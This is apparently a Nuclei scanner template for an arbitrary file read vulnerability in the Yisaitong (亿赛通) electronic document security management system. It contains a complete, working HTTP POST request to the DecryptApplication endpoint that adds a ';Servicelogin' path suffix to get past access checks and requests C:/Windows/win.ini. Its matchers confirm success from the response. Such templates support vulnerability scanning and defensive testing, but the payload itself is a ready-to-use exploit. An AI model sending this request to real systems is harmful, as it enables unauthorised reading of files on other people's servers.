id: yisaitong-DecryptApplication-File-reading

info:
  name: 亿赛通电子文档安全管理系统 DecryptApplication 任意文件读取漏洞
  author: yisaitong
  severity: high
  tags: File reading


http:
  - raw:
      - |
        POST /CDGServer3/client/DecryptApplication;Servicelogin HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        command=ViewUploadFile&filePath=C:/Windows/win.ini&fileName1=1.png&uploadFileId=1
    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '; for 16-bit app support'
      - type: status
        status: 
          - 200